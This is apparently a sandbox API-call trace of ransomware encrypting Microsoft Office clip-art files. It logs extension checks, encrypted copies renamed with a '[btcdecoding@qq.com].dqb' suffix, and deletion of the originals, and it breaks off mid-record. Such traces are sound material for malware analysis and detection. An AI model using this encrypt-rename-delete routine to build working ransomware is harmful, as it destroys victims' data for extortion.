[0058.104] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0058.104] lstrlenW (lpString=".7z") returned 3 [0058.104] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0058.104] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 63 [0058.104] lstrlenW (lpString=".dbf") returned 4 [0058.104] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0058.104] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 63 [0058.104] lstrlenW (lpString=".1cd") returned 4 [0058.104] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0058.104] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 63 [0058.104] lstrlenW (lpString=".jpg") returned 4 [0058.104] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0058.105] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.105] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.105] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\clip.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x150 [0058.105] GetLastError () returned 0x0 [0058.105] ReadFile (in: hFile=0x20c, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x8d6, lpOverlapped=0x0) returned 1 [0058.160] WriteFile (in: hFile=0x150, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x8e0, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x8e0, lpOverlapped=0x0) returned 1 [0058.161] ReadFile (in: hFile=0x20c, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0058.161] WriteFile (in: hFile=0x150, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xe4, lpOverlapped=0x0) returned 1 [0058.161] SetEndOfFile (hFile=0x150) returned 1 [0058.161] CloseHandle (hObject=0x150) returned 1 [0058.161] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.161] SetEndOfFile (hFile=0x20c) returned 1 [0058.162] CloseHandle (hObject=0x20c) returned 1 [0058.162] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0058.162] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\clip.wmf")) returned 1 [0058.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF") returned 59 [0058.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF") returned 59 [0058.163] lstrlenW (lpString=".doc") returned 4 [0058.163] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0058.163] lstrlenW (lpString=".docx") returned 5 [0058.163] lstrcmpiW (lpString1=".docx", lpString2="P.WMF") returned -1 [0058.163] lstrlenW (lpString=".pdf") returned 4 [0058.163] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0058.163] lstrlenW (lpString=".xls") returned 4 [0058.163] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0058.163] lstrlenW (lpString=".xlsx") returned 5 [0058.163] lstrcmpiW (lpString1=".xlsx", lpString2="P.WMF") returned -1 [0058.163] lstrlenW (lpString=".ppt") returned 4 [0058.163] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0058.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF") returned 59 [0058.163] lstrlenW (lpString=".zip") returned 4 [0058.163] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0058.163] lstrlenW (lpString=".rar") returned 4 [0058.163] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0058.163] lstrlenW (lpString=".bz2") returned 4 [0058.163] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0058.163] lstrlenW (lpString=".7z") returned 3 [0058.163] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0058.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF") returned 59 [0058.163] lstrlenW (lpString=".dbf") returned 4 [0058.163] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0058.164] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF") returned 59 [0058.164] lstrlenW (lpString=".1cd") returned 4 [0058.164] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0058.164] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF") returned 59 [0058.164] lstrlenW (lpString=".jpg") returned 4 [0058.164] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0058.195] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.196] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.196] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\crane.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x150 [0058.196] GetLastError () returned 0x0 [0058.196] ReadFile (in: hFile=0x20c, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x1496, lpOverlapped=0x0) returned 1 [0058.200] WriteFile (in: hFile=0x150, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x14a0, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x14a0, lpOverlapped=0x0) returned 1 [0058.204] ReadFile (in: hFile=0x20c, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0058.204] WriteFile (in: hFile=0x150, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0058.204] SetEndOfFile (hFile=0x150) returned 1 [0058.204] CloseHandle (hObject=0x150) returned 1 [0058.204] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.204] SetEndOfFile (hFile=0x20c) returned 1 [0058.205] CloseHandle (hObject=0x20c) returned 1 [0058.205] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0058.205] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\crane.wmf")) returned 1 [0058.205] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF") returned 60 [0058.206] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF") returned 60 [0058.206] lstrlenW (lpString=".doc") returned 4 [0058.206] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0058.206] lstrlenW (lpString=".docx") returned 5 [0058.206] lstrcmpiW (lpString1=".docx", lpString2="E.WMF") returned -1 [0058.206] lstrlenW (lpString=".pdf") returned 4 [0058.206] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0058.206] lstrlenW (lpString=".xls") returned 4 [0058.206] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0058.206] lstrlenW (lpString=".xlsx") returned 5 [0058.206] lstrcmpiW (lpString1=".xlsx", lpString2="E.WMF") returned -1 [0058.206] lstrlenW (lpString=".ppt") returned 4 [0058.206] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0058.206] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF") returned 60 [0058.206] lstrlenW (lpString=".zip") returned 4 [0058.206] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0058.206] lstrlenW (lpString=".rar") returned 4 [0058.206] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0058.206] lstrlenW (lpString=".bz2") returned 4 [0058.206] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0058.206] lstrlenW (lpString=".7z") returned 3 [0058.206] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0058.206] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF") returned 60 [0058.206] lstrlenW (lpString=".dbf") returned 4 [0058.206] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0058.206] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF") returned 60 [0058.206] lstrlenW (lpString=".1cd") returned 4 [0058.206] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0058.206] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF") returned 60 [0058.206] lstrlenW (lpString=".jpg") returned 4 [0058.206] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0058.207] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.207] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.208] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\craninst.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x150 [0058.208] GetLastError () returned 0x0 [0058.208] ReadFile (in: hFile=0x20c, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0xc18a, lpOverlapped=0x0) returned 1 [0059.079] WriteFile (in: hFile=0x150, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xc190, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xc190, lpOverlapped=0x0) returned 1 [0059.081] ReadFile (in: hFile=0x20c, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0059.081] WriteFile (in: hFile=0x150, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0059.081] SetEndOfFile (hFile=0x150) returned 1 [0059.081] CloseHandle (hObject=0x150) returned 1 [0059.081] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.081] SetEndOfFile (hFile=0x20c) returned 1 [0059.082] CloseHandle (hObject=0x20c) returned 1 [0059.082] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0059.083] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\craninst.wmf")) returned 1 [0059.083] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 63 [0059.083] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 63 [0059.083] lstrlenW (lpString=".doc") returned 4 [0059.083] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0059.083] lstrlenW (lpString=".docx") returned 5 [0059.083] lstrcmpiW (lpString1=".docx", lpString2="T.WMF") returned -1 [0059.083] lstrlenW (lpString=".pdf") returned 4 [0059.083] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0059.083] lstrlenW (lpString=".xls") returned 4 [0059.083] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0059.083] lstrlenW (lpString=".xlsx") returned 5 [0059.083] lstrcmpiW (lpString1=".xlsx", lpString2="T.WMF") returned -1 [0059.083] lstrlenW (lpString=".ppt") returned 4 [0059.083] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0059.083] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 63 [0059.083] lstrlenW (lpString=".zip") returned 4 [0059.083] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0059.083] lstrlenW (lpString=".rar") returned 4 [0059.083] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0059.083] lstrlenW (lpString=".bz2") returned 4 [0059.083] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0059.083] lstrlenW (lpString=".7z") returned 3 [0059.084] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0059.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 63 [0059.084] lstrlenW (lpString=".dbf") returned 4 [0059.084] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0059.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 63 [0059.084] lstrlenW (lpString=".1cd") returned 4 [0059.084] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0059.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 63 [0059.084] lstrlenW (lpString=".jpg") returned 4 [0059.084] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0059.084] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.084] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.084] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00449_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x150 [0059.085] GetLastError () returned 0x0 [0059.085] ReadFile (in: hFile=0x20c, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x2708, lpOverlapped=0x0) returned 1 [0059.086] WriteFile (in: hFile=0x150, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x2710, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x2710, lpOverlapped=0x0) returned 1 [0059.087] ReadFile (in: hFile=0x20c, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0059.087] WriteFile (in: hFile=0x150, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0059.087] SetEndOfFile (hFile=0x150) returned 1 [0059.088] CloseHandle (hObject=0x150) returned 1 [0059.088] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.088] SetEndOfFile (hFile=0x20c) returned 1 [0059.088] CloseHandle (hObject=0x20c) returned 1 [0059.088] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0059.089] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00449_.wmf")) returned 1 [0059.089] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 63 [0059.089] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 63 [0059.089] lstrlenW (lpString=".doc") returned 4 [0059.089] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0059.089] lstrlenW (lpString=".docx") returned 5 [0059.089] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0059.089] lstrlenW (lpString=".pdf") returned 4 [0059.089] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0059.089] lstrlenW (lpString=".xls") returned 4 [0059.089] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0059.089] lstrlenW (lpString=".xlsx") returned 5 [0059.089] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0059.089] lstrlenW (lpString=".ppt") returned 4 [0059.089] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0059.089] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 63 [0059.089] lstrlenW (lpString=".zip") returned 4 [0059.089] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0059.089] lstrlenW (lpString=".rar") returned 4 [0059.089] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0059.089] lstrlenW (lpString=".bz2") returned 4 [0059.090] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0059.090] lstrlenW (lpString=".7z") returned 3 [0059.090] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0059.090] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 63 [0059.090] lstrlenW (lpString=".dbf") returned 4 [0059.090] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0059.090] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 63 [0059.090] lstrlenW (lpString=".1cd") returned 4 [0059.090] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0059.090] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 63 [0059.090] lstrlenW (lpString=".jpg") returned 4 [0059.090] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0059.090] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.090] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.090] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00687_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x150 [0059.091] GetLastError () returned 0x0 [0059.091] ReadFile (in: hFile=0x20c, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x5130, lpOverlapped=0x0) returned 1 [0059.092] WriteFile (in: hFile=0x150, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x5140, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x5140, lpOverlapped=0x0) returned 1 [0059.094] ReadFile (in: hFile=0x20c, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0059.094] WriteFile (in: hFile=0x150, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0059.094] SetEndOfFile (hFile=0x150) returned 1 [0059.094] CloseHandle (hObject=0x150) returned 1 [0059.094] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.094] SetEndOfFile (hFile=0x20c) returned 1 [0059.095] CloseHandle (hObject=0x20c) returned 1 [0059.095] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0059.095] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00687_.wmf")) returned 1 [0059.096] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 63 [0059.096] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 63 [0059.096] lstrlenW (lpString=".doc") returned 4 [0059.096] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0059.096] lstrlenW (lpString=".docx") returned 5 [0059.096] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0059.096] lstrlenW (lpString=".pdf") returned 4 [0059.096] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0059.096] lstrlenW (lpString=".xls") returned 4 [0059.096] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0059.096] lstrlenW (lpString=".xlsx") returned 5 [0059.096] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0059.096] lstrlenW (lpString=".ppt") returned 4 [0059.096] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0059.096] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 63 [0059.096] lstrlenW (lpString=".zip") returned 4 [0059.096] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0059.096] lstrlenW (lpString=".rar") returned 4 [0059.096] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0059.096] lstrlenW (lpString=".bz2") returned 4 [0059.096] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0059.096] lstrlenW (lpString=".7z") returned 3 [0059.096] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0059.096] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 63 [0059.097] lstrlenW (lpString=".dbf") returned 4 [0059.097] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0059.097] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 63 [0059.097] lstrlenW (lpString=".1cd") returned 4 [0059.097] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0059.097] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 63 [0059.097] lstrlenW (lpString=".jpg") returned 4 [0059.097] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0059.097] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.097] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.097] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00705_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x150 [0059.097] GetLastError () returned 0x0 [0059.097] ReadFile (in: hFile=0x20c, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x600c, lpOverlapped=0x0) returned 1 [0059.099] WriteFile (in: hFile=0x150, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x6010, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x6010, lpOverlapped=0x0) returned 1 [0059.101] 